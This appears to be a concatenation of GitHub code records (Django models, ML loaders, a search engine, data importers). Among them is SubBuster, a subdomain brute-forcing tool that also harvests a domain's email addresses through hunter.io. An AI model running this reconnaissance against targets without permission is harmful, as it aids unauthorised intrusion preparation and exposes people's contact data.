{'primary_key': 'True'}),\n 'name': ('django.db.models.fields.CharField', [], {'max_length': '60'})\n },\n 'OOExample.instance': {\n 'Meta': {'object_name': 'Instance'},\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'release': ('django.db.models.fields.related.ForeignKey', [], {'to': \"orm['OOExample.Release']\"})\n },\n 'OOExample.instanceattribute': {\n 'Meta': {'object_name': 'InstanceAttribute'},\n 'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': \"orm['OOExample.Attribute']\"}),\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'instance': ('django.db.models.fields.related.ForeignKey', [], {'to': \"orm['OOExample.Instance']\"}),\n 'value': ('django.db.models.fields.CharField', [], {'max_length': '60'})\n },\n 'OOExample.release': {\n 'Meta': {'object_name': 'Release'},\n 'attrbutes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': \"orm['OOExample.Attribute']\", 'null': 'True', 'blank': 'True'}),\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n }\n }\n\n complete_apps = ['OOExample']","repo_name":"Adnn/Collecster_OLD","sub_path":"OOExample/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31238764527","text":"#!/usr/bin/env python\n\nimport sys , requests , socket , re , argparse \nimport urllib.parse as urlparse\nfrom os import path\n\nquiet = False\nverbose = False\nip = False\napi_key = \"\"\nListFile = \"\"\noutFile = \"\" \nports = \"\"\ndomain = \"\"\nwordlist = \"\"\nEmails = []\nDomains = []\nmark = '[+] '\n\ndef StartUp():\n global quiet\n global api_key \n global verbose\n global ip\n global domain\n global outFile\n global wordlist\n global ListFile\n global ports\n \n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,epilog='Example: python ' + sys.argv[0] + \" -d google.com -o out.txt\" + '\\n\\n---SubBuster v0.4---\\nCreated By: @shoamshilo 2020 ',\n description='''SubBuster is a sub-domain discovery tool that uses a custom made wordlist to detect sub-domains.\\nThis tool can assist penetration tester or OSINT investigators in determining a corporation sub-domains.\\nit allowsfor both active and passive scanning of a domain.''')\n parser._optionals.title = \"OPTIONS\"\n parser.add_argument('-d' , action='store', dest='domain' , help='Specify the base domain.')\n parser.add_argument('-w' , action='store', dest='wordlist' , help=\"Path to the wordlist. If the flag is not set SubBuster will use its wordlist.\")\n parser.add_argument('-q', action='store_true', default=False, dest='quiet' , help='Toggle quiet mode.')\n parser.add_argument('-o' , action='store', dest='outFile', help='Specify an output file.')\n parser.add_argument('-f' , action='store', dest='ListFile' ,help='Specify a list of domains.')\n parser.add_argument('-p' , action='store', dest='ports' , help='Specify a port 80 or 443.')\n parser.add_argument('-v' , action='store_true', default=False, dest='verbose' , help=' Verbose output.')\n parser.add_argument('-E' , action='store', dest='api_key' , help='Toggle email searching with hunter.io. Requires an API key.')\n parser.add_argument('-I' , action='store_true', default=False, dest='ip' , help='Toggle hostname IP resolve')\n parser.add_argument('--version' , action='version',dest='v0.4')\n\n args = parser.parse_args()\n\n quiet = args.quiet\n verbose = args.verbose\n ip = args.ip\n api_key = args.api_key\n ListFile = args.ListFile\n outFile = args.outFile \n ports = args.ports\n domain = args.domain\n wordlist = args.wordlist\n\ndef BrutForce():\n global Domains\n if ErrorCheck():\n print(mark +\"Searching Sub Domains\")\n with open(wordlist) as File:\n line = File.readline()\n while line:\n http = f\"http://{line.strip()}.{domain}\"\n https = f\"https://{line.strip()}.{domain}\"\n if ports:\n port = Ports()\n if '80' in port:\n if url_check(http) and not inDomains(http):\n Domains.append(http)\n if '443' in port:\n if url_check(https) and not inDomains(https):\n Domains.append(https)\n elif url_check(https) and not inDomains(https):\n Domains.append(https) \n else:\n if url_check(http) and not inDomains(http):\n Domains.append(http)\n if verbose:\n print(mark + Domains[len(Domains)-1]) \n line = File.readline() \n\ndef qBruteForce():\n page_no = 100\n baseurl = f\"https://google.com/search?q={domain}&btnG=Search&hl=en-US&biw=&bih=&gbv=1&start={page_no}&filter=0\"\n resp = requests.get(baseurl)\n extractdomains(responsehandler(resp))\n\ndef extractdomains(resp):\n global Domains\n list = []\n regex = re.compile(r'(?:(?:https?|ftp):\\/\\/)?[\\w/\\-?=%.]+\\.[\\w/\\-&?=%.]+')\n try:\n list = regex.findall(resp)\n for link in list:\n if link.startswith('http'):\n link = 'https://' + urlparse.urlparse(link).netloc\n if link.endswith(domain) and not inDomains(link):\n Domains.append(link)\n if verbose:\n print(mark + link)\n except:\n pass\n\ndef responsehandler(response):\n if response is None:\n return 0\n return response.text if hasattr(response, \"text\") else response.connect\n\ndef inDomains(domain):\n for url in Domains:\n if url == domain:\n return True\n return False\n\ndef listFile():\n global domain\n try:\n with open(ListFile, 'r') as listfile:\n domain = listfile.readline().strip()\n while domain:\n print(mark + f\"Busting {domain}:\")\n if quiet:\n qBruteForce()\n else:\n BrutForce()\n domain = listfile.readline()\n except FileNotFoundError:\n print(mark + \"\"\"There is an error with your domain file. \n it is either not found or it doesn't exists.\"\"\")\n sys.exit()\n\ndef url_check(url):\n try:\n r = requests.get(url)\n if r.status_code:\n return True\n return False\n except Exception:\n return False\n\ndef Ports():\n return ports.split(',')\n\ndef ip_resolve():\n i=0\n for url in Domains:\n s = url.split('/')\n url = f\"{url} : {socket.gethostbyname(s[2])}\"\n Domains[i] = url\n i+=1\n\ndef hunter():\n global Emails\n url = f\"https://api.hunter.io/v2/domain-search?domain={domain}&api_key={api_key}\"\n r = requests.get(url)\n response = r.json()\n for email in response['data']['emails']:\n Emails.append(\"Email: \" + str(email['value']))\n\ndef printDomains():\n if ip:\n ip_resolve()\n print(mark + f\"Found {str(len(Domains))} sub-domains:\")\n for url in Domains:\n print(mark + url)\n for email in Emails:\n print(mark + email)\n\ndef OutPut():\n with open(outFile , 'w') as out:\n for url in Domains:\n out.writelines(url + '\\n')\n out.writelines('Email for the domain'+ '\\n')\n for email in Emails:\n out.writelines(email + '\\n')\n\ndef ErrorCheck():\n global wordlist\n if not wordlist:\n print(mark + \"You haven't specified a wordlist. Useing SubBusters wordlist.\")\n wordlist = \"wordlist.txt\"\n if not path.exists(wordlist):\n print(mark + \"\"\"There is an error with your wordlist. \n it is either not found or it doesn't exists.\"\"\")\n sys.exit() \n if not domain:\n if ListFile:\n return True\n print(mark + \"You haven't specified a domain.\")\n sys.exit()\n return True\n \nif __name__ == '__main__':\n StartUp()\n if quiet:\n qBruteForce()\n elif not quiet:\n BrutForce()\n if ListFile:\n listFile()\n printDomains()\n if outFile:\n OutPut()","repo_name":"shoamshilo/SubBuster","sub_path":"SubBuster.py","file_name":"SubBuster.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14490872943","text":"import tensorflow as tf\n\n\ndef load_generator(g_params=None, is_g_clone=False, ckpt_dir=None, custom_cuda=True):\n if custom_cuda:\n from stylegan2.generator import Generator\n else:\n from stylegan2_ref.generator import Generator\n\n if g_params is None:\n g_params = {\n 'z_dim': 512,\n 'w_dim': 512,\n 'labels_dim': 0,\n 'n_mapping': 8,\n 'resolutions': [4, 8, 16, 32, 64, 128, 256, 512, 1024],\n 'featuremaps': [512, 512, 512, 512, 512, 256, 128, 64, 32],\n }\n\n test_latent = tf.ones((1, g_params['z_dim']), dtype=tf.float32)\n test_labels = tf.ones((1, g_params['labels_dim']), dtype=tf.float32)\n\n # build generator model\n generator = Generator(g_params)\n _ = generator([test_latent, test_labels])\n\n if ckpt_dir is not None:\n if is_g_clone:\n ckpt = tf.train.Checkpoint(g_clone=generator)\n else:\n ckpt = tf.train.Checkpoint(generator=generator)\n manager = tf.train.CheckpointManager(ckpt, ckpt_dir, max_to_keep=1)\n ckpt.restore(manager.latest_checkpoint).expect_partial()\n if manager.latest_checkpoint:\n print(f'Generator restored from {manager.latest_checkpoint}')\n return generator\n\n\ndef load_discriminator(d_params=None, ckpt_dir=None, custom_cuda=True):\n if custom_cuda:\n from stylegan2.discriminator import Discriminator\n else:\n from stylegan2_ref.discriminator import Discriminator\n\n if d_params is None:\n d_params = {\n 'labels_dim': 0,\n 'resolutions': [4, 8, 16, 32, 64, 128, 256, 512, 1024],\n 'featuremaps': [512, 512, 512, 512, 512, 256, 128, 64, 32],\n }\n\n res = d_params['resolutions'][-1]\n test_images = tf.ones((1, 3, res, res), dtype=tf.float32)\n test_labels = tf.ones((1, d_params['labels_dim']), dtype=tf.float32)\n\n # build discriminator model\n discriminator = Discriminator(d_params)\n _ = discriminator([test_images, test_labels])\n\n if ckpt_dir is not None:\n ckpt = tf.train.Checkpoint(discriminator=discriminator)\n manager = tf.train.CheckpointManager(ckpt, ckpt_dir, max_to_keep=1)\n ckpt.restore(manager.latest_checkpoint).expect_partial()\n if manager.latest_checkpoint:\n print('Discriminator restored from {}'.format(manager.latest_checkpoint))\n return discriminator\n","repo_name":"moono/stylegan2-tf-2.x","sub_path":"load_models.py","file_name":"load_models.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"61"} +{"seq_id":"6582896900","text":"from django.utils import timezone\nfrom django.db import models\nfrom django.urls import reverse\nfrom core.models import AbstractTimeStamped\nfrom django_countries.fields import CountryField\nfrom cal import Calendar\n\n\n# Create your models here.\nclass AbstractItem(AbstractTimeStamped):\n \"\"\" Abstract model of Item \"\"\"\n\n name = models.CharField(max_length=80)\n\n class Meta:\n abstract: True\n\n def __str__(self):\n return self.name\n\n\nclass RoomType(AbstractItem):\n \"\"\" Room type objects \"\"\"\n\n class Meta:\n verbose_name = \"Room Type\"\n ordering = [\"name\"]\n\n\nclass Amenity(AbstractItem):\n \"\"\" Amenity objects \"\"\"\n\n class Meta:\n verbose_name_plural = \"Amenities\"\n\n\nclass Facility(AbstractItem):\n \"\"\" Facility objects \"\"\"\n\n class Meta:\n verbose_name_plural = \"Facilities\"\n\n\nclass HouseRule(AbstractItem):\n \"\"\" House rule objects \"\"\"\n\n pass\n\n\nclass Photo(AbstractTimeStamped):\n \"\"\" Photo model definition \"\"\"\n\n caption = models.CharField(max_length=80)\n image = models.ImageField(upload_to=\"room_photos\")\n room = models.ForeignKey(\n \"Room\", related_name=\"my_photos\", on_delete=models.CASCADE, blank=True\n )\n\n def __str__(self):\n return self.caption\n\n\nclass Room(AbstractTimeStamped):\n \"\"\" Rooms model definitions \"\"\"\n\n name = models.CharField(max_length=140)\n description = models.TextField()\n country = CountryField()\n city = models.CharField(max_length=80)\n price = models.IntegerField()\n address = models.CharField(max_length=140)\n\n guests = models.IntegerField()\n beds = models.IntegerField()\n bedrooms = models.IntegerField()\n baths = models.IntegerField()\n check_in = models.TimeField()\n check_out = models.TimeField()\n instant_book = models.BooleanField(default=False)\n\n def get_absolute_url(self):\n return reverse(\"rooms:detail\", kwargs={\"pk\": self.pk})\n\n host = models.ForeignKey(\n \"users.User\", related_name=\"my_rooms\", on_delete=models.CASCADE\n )\n room_type = models.ForeignKey(\n RoomType,\n related_name=\"my_rooms\",\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n )\n amenities = models.ManyToManyField(Amenity, related_name=\"my_rooms\", blank=True)\n facilities = models.ManyToManyField(Facility, related_name=\"my_rooms\", blank=True)\n house_rules = models.ManyToManyField(HouseRule, related_name=\"my_rooms\", blank=True)\n\n def save(self, *args, **kwargs):\n self.city = str.capitalize(self.city)\n super().save(*args, **kwargs) # Call the real save() method\n\n def first_image(self):\n (first,) = self.my_photos.all()[:1]\n return first.image.url\n\n def from_second_four_image(self):\n photos = self.my_photos.all()[1:5]\n return photos\n\n def get_ratings(self):\n reviews = self.my_reviews.all()\n avgs = 0.0\n\n if reviews.count() > 0:\n for r in reviews:\n avgs = avgs + r.rating_average()\n avgs = avgs / reviews.count()\n return round(avgs, 2)\n\n def sum_reviews(self):\n reviews = self.my_reviews.all()\n sums = {}\n sum_cleanliness = 0.0\n sum_location = 0.0\n sum_communication = 0.0\n sum_value = 0.0\n sum_check_in = 0.0\n sum_accuracy = 0.0\n\n if len(reviews) >0:\n count_of = len(reviews)\n for r in reviews:\n sum_cleanliness += r.cleanliness\n sum_location += r.location\n sum_communication += r.communication\n sum_value += r.value\n sum_check_in += r.check_in\n sum_accuracy += r.accuracy\n\n sums = {\n \"cleanliness\": ( round(sum_cleanliness/count_of,2), int((sum_cleanliness/ count_of/5.0)*100)),\n \"location\": (round(sum_location/count_of, 2), int((sum_location/ count_of / 5.0)*100)),\n \"communication\": (round(sum_communication/count_of, 2), int((sum_communication / count_of / 5.0)*100)),\n \"value\": (round(sum_value/count_of, 2), int((sum_value / count_of / 5.0)*100)),\n \"checkin\": (round(sum_check_in/count_of, 2), int((sum_check_in / count_of / 5.0)*100)),\n \"accuracy\": (round(sum_accuracy/count_of, 2), int((sum_accuracy / count_of / 5.0)*100)),\n }\n else:\n sums = {\n \"cleanliness\": (0.0, 0),\n \"location\": (0.0, 0),\n \"communication\": (0.0, 0),\n \"value\": (0.0, 0),\n \"checkin\": (0.0, 0),\n \"accuracy\": (0.0, 0),\n }\n return sums\n\n def get_this_and_next_months(self):\n now = timezone.now()\n year = now.year\n month = now.month\n next_month = month+1\n next_year = year\n\n if month == 12:\n next_month = 1\n next_year = year+1\n\n this_month_day = Calendar(year, month)\n next_month_day = Calendar(next_year, next_month)\n\n return [this_month_day, next_month_day]\n\n def __str__(self):\n return self.name\n","repo_name":"pleed0215/django_bnb","sub_path":"rooms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13629965276","text":"import argparse\nimport json\nimport os\nimport socketserver\nimport time\nfrom bisect import bisect_left\nfrom functools import reduce\nfrom pathlib import Path\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport engine.modules.utils as utils\n\n\ndef _analyze(text, is_query):\n response = utils.send_json({\n 'action': 'process',\n 'data': text,\n 'is_query': is_query\n }, NETWORK['text']['host'], NETWORK['text']['port'], True)\n return response['terms']\n\n\ndef _analyze_query(query):\n return _analyze(query, True)\n\n\ndef _analyze_document(document):\n return _analyze(document.read(), False)\n\n\nclass Vector:\n def __init__(self):\n self.path = ''\n self.freq = None\n self.w = None\n self.terms = None\n self.term_count = 0\n self.doc_count = 0\n self.doc_names = None\n self.last_query = {} # last query answered for each session\n\n def _build_index(self, freq, terms):\n index = [{'key': term, 'value': {'documents': []}} for term in terms]\n freq = np.array(freq.todense())\n\n it = np.nditer(freq, flags=['multi_index'])\n while not it.finished:\n f = int(it[0])\n i, j = it.multi_index\n if f:\n index[i]['value']['documents'].append({'document': self.doc_names[j], 'freq': f})\n it.iternext()\n\n utils.send_json({\n 'action': 'create',\n 'data': index\n }, NETWORK['indices']['host'], NETWORK['indices']['port'])\n\n def _calculate_freq(self):\n vectorizer = CountVectorizer(input='file', analyzer=_analyze_document)\n documents = []\n for doc in self.doc_names:\n path = os.path.join(self.path, doc + '.txt')\n documents.append(open(path))\n\n freq = vectorizer.fit_transform(documents).transpose()\n terms = vectorizer.get_feature_names()\n return freq, terms\n\n def _get_similarities(self, q):\n similarities = cosine_similarity(q, self.w.transpose()).tolist()[0]\n return similarities\n\n def build(self, path):\n self.path = path\n self.doc_names = [\n '.'.join(doc.name.split('.')[:-1])\n for doc in Path(self.path).iterdir() if doc.name.endswith('.txt')\n ]\n self.doc_names.sort()\n\n index = utils.send_json({\n 'action': 'load',\n 'path': path\n }, NETWORK['indices']['host'], NETWORK['indices']['port'], True)\n\n if not index:\n freq, terms = self._calculate_freq()\n self._build_index(freq, terms)\n else:\n freq, terms = utils.load_freq(index, self.doc_names)\n\n self.freq = freq\n self.w = TfidfTransformer().fit_transform(freq)\n self.terms = terms\n self.term_count = self.w.shape[0]\n self.doc_count = self.w.shape[1]\n\n def query(self, token, q, count, continuation=False):\n if count == -1:\n count = self.doc_count\n\n if isinstance(q, str):\n if continuation:\n q = self.last_query[token]\n else:\n vectorizer = TfidfVectorizer(vocabulary=self.terms, analyzer=_analyze_query)\n q = vectorizer.fit_transform([q])\n\n self.last_query[token] = q\n similarities = self._get_similarities(q)\n documents = np.argsort(similarities)[-count:][::-1]\n documents = [doc for doc in documents if similarities[doc] > 0]\n\n if documents:\n result = {\n 'action': 'report',\n 'success': True,\n 'results': [\n {\n 'document': self.doc_names[doc],\n 'match': similarities[doc]\n } for doc in documents\n ]\n }\n else:\n result = {\n 'action': 'report',\n 'success': False\n }\n return json.dumps(result)\n\n def update_query(self, token, doc_name, positive, count):\n q = self.last_query[token]\n j = bisect_left(self.doc_names, doc_name)\n d = self.w[:, j].transpose()\n if positive:\n q += d\n else:\n q -= d\n return self.query(token, q, count)\n\n\nclass GeneralizedVector(Vector):\n def __init__(self):\n super().__init__()\n self.k = None\n\n def _calculate_wong_k(self):\n w = np.array(self.w.todense()).tolist()\n minterms = []\n for j in range(self.doc_count):\n m = 0\n for i in range(self.term_count):\n m += 2 ** i if w[i][j] else 0\n minterms.append(m)\n\n # Calculate correlations\n m = sorted(list(set(minterms)))\n c = np.zeros((self.term_count, len(m))).tolist()\n for i in range(self.term_count):\n for j in range(self.doc_count):\n r = bisect_left(m, minterms[j])\n c[i][r] += w[i][j]\n\n # Calculate the index term vectors as linear combinations of minterm vectors\n k = []\n for i in range(self.term_count):\n num = reduce(\n lambda acum, r: acum + np.array([c[i][r] if 2 ** l & m[r] else 0 for l in range(self.term_count)]),\n range(len(m)),\n np.zeros(self.term_count)\n )\n k.append(num / np.linalg.norm(num))\n\n return np.array(k)\n\n def _calculate_pearson_k(self):\n A = self.freq.astype(np.float64)\n n = A.shape[1]\n\n # Compute the covariance matrix\n rowsum = A.sum(1)\n centering = rowsum.dot(rowsum.T.conjugate()) / n\n C = (A.dot(A.T.conjugate()) - centering) / (n - 1)\n\n # The correlation coefficients are given by\n # C_{i,j} / sqrt(C_{i} * C_{j})\n d = np.diag(C)\n k = C / np.sqrt(np.outer(d, d))\n\n return np.abs(k)\n\n def _get_similarities(self, q):\n q = q.dot(self.k)\n d = self.w.transpose().dot(self.k)\n\n similarities = cosine_similarity(q, d).tolist()[0]\n return similarities\n\n def build(self, path):\n super().build(path)\n self.k = self._calculate_wong_k()\n\n\nclass TCPHandler(socketserver.BaseRequestHandler):\n def handle(self):\n global MODEL, ACTIVE_MODEL\n request = utils.receive_json(self.request)\n start = time.time()\n\n if request['action'] == 'set_model':\n model = request['model']\n if model in MODELS:\n ACTIVE_MODEL = request['model']\n MODEL = MODELS[ACTIVE_MODEL]()\n else:\n self.request.sendall(json.dumps({\n 'action': 'error',\n 'message': 'Incorrect model selected.'\n }).encode())\n elif request['action'] == 'get_model':\n self.request.sendall(json.dumps({\n 'action': 'report',\n 'model': ACTIVE_MODEL\n }).encode())\n elif request['action'] == 'build':\n success = True\n # noinspection PyBroadException\n try:\n MODEL.build(request['path'])\n except Exception:\n success = False\n self.request.sendall(json.dumps({\n 'action': 'report',\n 'success': success\n }).encode())\n elif request['action'] == 'query':\n self.request.sendall(\n MODEL.query(\n request['token'],\n request['query'],\n request['count'],\n request['continuation']\n ).encode()\n )\n elif request['action'] == 'update_query':\n self.request.sendall(\n MODEL.update_query(request['token'], request['document'], request['positive'],\n request['count']).encode()\n )\n else:\n self.request.sendall(json.dumps({\n 'action': 'error',\n 'message': 'Invalid action.'\n }).encode())\n\n print('Processed action \"%s\" in %.2f seconds' % (request['action'], time.time() - start))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('network')\n parser.add_argument('--model', default='Vector')\n args = parser.parse_args()\n\n ACTIVE_MODEL = args.model\n MODELS = {\n 'Vector': Vector,\n 'GeneralizedVector': GeneralizedVector\n }\n MODEL = MODELS[ACTIVE_MODEL]()\n NETWORK = json.load(open(args.network))\n\n server = socketserver.TCPServer((NETWORK['models']['host'], NETWORK['models']['port']), TCPHandler)\n server.serve_forever()\n","repo_name":"ealmuina/search-engine","sub_path":"engine/modules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72399748034","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 10 10:53:32 2021\n\n@author: ilegra\n\"\"\"\nimport subprocess\nfrom os import path\n\nfiles_path = path.dirname(path.realpath(__file__))\n\nname_basics_url = ' https://datasets.imdbws.com/name.basics.tsv.gz'\ntitle_basics_url = ' https://datasets.imdbws.com/title.basics.tsv.gz'\ntitle_principals_url = ' https://datasets.imdbws.com/title.principals.tsv.gz'\nurl_lst = [name_basics_url, title_basics_url, title_principals_url]\n\nname_basics_path = '/datasets/name.basics/'\ntitle_basics_path = '/datasets/title.basics/'\ntitle_principals_path = '/datasets/title.principals/'\npath_lst = [name_basics_path, title_basics_path, title_principals_path]\n\nname_basics_file = 'name.basics.tsv.gz'\ntitle_basics_file = 'title.basics.tsv.gz'\ntitle_principals_file = 'title.principals.tsv.gz'\nfile_lst = [name_basics_file, title_basics_file, title_principals_file]\n\ndef download_datasets():\n print('Downloading datasets...')\n \n subprocess.call('rm -rf datasets', shell=True)\n subprocess.call('mkdir datasets', shell=True)\n for index in range(3):\n subprocess.call('wget -P ' + files_path + path_lst[index] + url_lst[index], shell = True)\n \n print('Datasets download was completed.')\n \ndef unzip_datasets():\n print('Decompressing datasets...')\n \n for index in range(3):\n subprocess.call('gunzip ' + files_path + path_lst[index] + file_lst[index], shell = True)\n \n print('Datasets decompress was completed.')\n\n\ndownload_datasets()\nunzip_datasets()\n","repo_name":"ibragionp/devops-and-cloud-basics","sub_path":"tema06/get_datasets.py","file_name":"get_datasets.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35351042784","text":"from celery import shared_task\nfrom django.contrib.auth.models import User\nimport time\n\n\n@shared_task\ndef add(x, y, *args, **kwargs):\n print(kwargs)\n user = User.objects.get(id=kwargs.get('uid', 1))\n print(f\"任务函数add 正在执行...\\n用户{user.username}\")\n time.sleep(2)\n return x + y\n\n\n@shared_task\ndef generic(*args, **kwargs):\n print(\"generic task running...\")\n print(f\"args:\\t{args}\\nkwargs:\\t{kwargs}\")\n","repo_name":"Heaciy/cron","sub_path":"task/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26930511508","text":"import os\nfrom argparse import ArgumentParser\nfrom collections import OrderedDict\nfrom math import isnan\n\nimport pandas as pd\nimport pymongo\n\nfrom gsodtools.getdb import get_db\n\n\ndef load_fips(country):\n # Load FIPS country codes\n fips = pd.read_csv(country, sep=r\"\\s{2,}\", names=[\n \"CTRY\", \"CTRY_NAME\"], engine='python')\n\n return fips\n\n\ndef load_station(station):\n # Load station data\n station = pd.read_csv(station, usecols=[\"USAF\", \"WBAN\", \"CTRY\"],\n dtype={\"USAF\": str, \"WBAN\": str})\n\n station = station.drop(station[station[\"CTRY\"].isnull()].index)\n station = pd.concat((station, station.loc[:, ['USAF', 'WBAN']].apply(\n ''.join, axis=1).rename(\"STATION\")), axis=1)\n station = station.set_index(\"STATION\")\n\n return station\n\n\ndef load_data(folder, stationdata, database):\n # Load data from folder\n for root, _, files in os.walk(folder):\n for file in files:\n if file.endswith(\".csv\"):\n weatherdata = pd.read_csv(os.path.join(root, file), usecols=[\n \"STATION\", \"DATE\", \"LATITUDE\",\n \"LONGITUDE\", \"ELEVATION\", \"NAME\",\n \"TEMP\", \"DEWP\", \"SLP\", \"STP\",\n \"VISIB\", \"WDSP\", \"MXSPD\", \"GUST\",\n \"MAX\", \"MIN\", \"PRCP\", \"SNDP\", \"FRSHTT\"],\n na_values=['9999.9', '999.9', '99.99'],\n parse_dates=['DATE'], index_col=['DATE'],\n infer_datetime_format=True, dtype={\"STATION\": str, \"FRSHTT\": str})\n\n if weatherdata[\"LATITUDE\"][0] != 0.0:\n print(f\"{root}\\\\{file} processing\")\n\n try:\n station = stationdata.loc[weatherdata[\"STATION\"][0]]\n except KeyError as exception:\n print(f\"Station {exception.args[0]} not found\")\n continue\n\n process_data(weatherdata, station, database)\n\n else:\n print(f\"{root}\\\\{file} skipped\")\n\n\ndef process_data(data, station, database):\n station_id = data[\"STATION\"][0]\n station_dict = station.to_dict()\n country = OrderedDict([(\"fips\", station_dict[\"CTRY\"]),\n (\"name\", station_dict[\"CTRY_NAME\"])])\n station_dict = OrderedDict([(\"_id\", station_id), (\"name\", data[\"NAME\"][0]),\n (\"usaf\", station_dict[\"USAF\"]),\n (\"wban\", station_dict[\"WBAN\"]),\n (\"country\", country), (\"location\", {\n \"type\": \"Point\",\n \"coordinates\": [data[\"LONGITUDE\"][0], data[\"LATITUDE\"][0]]}),\n (\"elevation\", data[\"ELEVATION\"][0])])\n\n try:\n database[\"stations\"].update_one(\n {\"_id\": station_id}, {\"$set\": station_dict}, upsert=True)\n except pymongo.errors.WriteError:\n print(f\"Station {station_id} failed\")\n\n data = data.drop(columns=[\"STATION\", \"NAME\", \"LATITUDE\", \"LONGITUDE\",\n \"ELEVATION\"])\n\n insert_query = []\n data_dict = data.to_dict(orient=\"index\", into=OrderedDict)\n\n for key, value in data_dict.items():\n temp = value[\"FRSHTT\"]\n indicators = OrderedDict([(\"fog\", temp[0]), (\"rain\", temp[1]), (\"snow\", temp[2]),\n (\"hail\", temp[3]), (\"thunder\", temp[4]), (\"tornado\", temp[5])])\n\n summary = OrderedDict()\n summary[\"temperature\"] = value[\"TEMP\"]\n summary[\"dewPoint\"] = value[\"DEWP\"]\n summary[\"seaLevelPressure\"] = value[\"SLP\"]\n summary[\"stationPressure\"] = value[\"STP\"]\n summary[\"visibility\"] = value[\"VISIB\"]\n summary[\"windSpeed\"] = value[\"WDSP\"]\n summary[\"maxSustainedWindSpeed\"] = value[\"MXSPD\"]\n summary[\"gust\"] = value[\"GUST\"]\n summary[\"maxTemperature\"] = value[\"MAX\"]\n summary[\"minTemperature\"] = value[\"MIN\"]\n summary[\"precipitation\"] = value[\"PRCP\"]\n summary[\"snowDepth\"] = value[\"SNDP\"]\n summary = {k: summary[k] for k in summary if not isnan(summary[k])}\n summary[\"indicators\"] = indicators\n\n datarow = OrderedDict(\n [(\"station\", station_dict), (\"timestamp\", key)])\n datarow.update(summary)\n\n insert_query.append(datarow)\n\n try:\n database[\"weatherData\"].insert_many(insert_query)\n except pymongo.errors.DuplicateKeyError as exception:\n print(exception)\n except pymongo.errors.BulkWriteError as exception:\n print(exception)\n except pymongo.errors.WriteError as exception:\n print(exception)\n\n\ndef parse_arg():\n parser = ArgumentParser(description='Import GSOD data into MongoDB')\n parser.add_argument(\n 'folder', help='Folder containing GSOD data')\n parser.add_argument('country', help='Country FIPS file')\n parser.add_argument('station', help='ISD History file')\n\n return parser.parse_args()\n\n\ndef main():\n args = parse_arg()\n\n countrydata = load_fips(args.country)\n stationdata = load_station(args.station)\n stationdata = stationdata.reset_index().merge(\n countrydata, on=['CTRY'], how='left')\n stationdata = stationdata.set_index(\"STATION\")\n\n client = get_db(1)\n\n database = client[\"gsod\"]\n load_data(args.folder, stationdata, database)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"KohGeek/GSODAnalysis","sub_path":"src/importdb.py","file_name":"importdb.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5438256295","text":"#! python3\r\n\"\"\" spring 2021\r\nPrints the current weather for my location. \"\"\"\r\nimport sys\r\nimport json\r\nimport pathlib\r\nimport requests\r\nimport datetime\r\n\r\nUSAGE = f\"USAGE: python3 {sys.argv[0]} apikey\"\r\n\r\n# weatherbit:\r\nurl = \"https://api.weatherbit.io/v2.0/current\"\r\nlocation = \"515012\"\r\nif len(sys.argv) == 2:\r\n apikey = sys.argv[1]\r\nelse:\r\n print(USAGE)\r\n sys.exit(0)\r\n\r\n\r\n# check if data file exists in folder;\r\n# check file lifetime;\r\ninfo = None\r\nrequest = False\r\nfilename = pathlib.Path(\"weatherbit.json\")\r\n\r\nif filename.exists():\r\n file_mtime = filename.stat().st_mtime\r\n file_mtime = datetime.datetime.fromtimestamp(file_mtime)\r\n lifetime = file_mtime + datetime.timedelta(hours=10)\r\n if datetime.datetime.now() < lifetime:\r\n print(\"Last request less than 10 hours.\")\r\n with open(\"weatherbit.json\") as file:\r\n data = json.loads(\r\n json.load(file)\r\n )\r\n info = data['data'][0]\r\n else:\r\n request = True\r\nelse:\r\n request = True\r\n\r\n# request json;\r\nif request is True:\r\n try:\r\n answer = requests.get(\r\n url=url, params=dict(city_id=location, key=apikey)\r\n )\r\n answer.raise_for_status()\r\n with open(\"weatherbit.json\", 'w') as write_file:\r\n json.dump(answer.text, write_file)\r\n data = json.loads(answer.text)\r\n info = data['data'][0]\r\n print(\"New json data requested.\")\r\n except OSError as error:\r\n print(\"ERROR.\", error)\r\n sys.exit(1)\r\n except Exception as alert:\r\n print(\"ALERT.\", alert)\r\n sys.exit(2)\r\n\r\n# format;\r\nlocation = f\"{info['timezone']}, {location}; {info['city_name']}.\"\r\ndate = f\"Request time: {info['ob_time']}\"\r\ntemperature = f\"Temperature: {info['temp']}\"\r\napparent = f\"Feels like: {info['app_temp']}\"\r\nwind_direction = 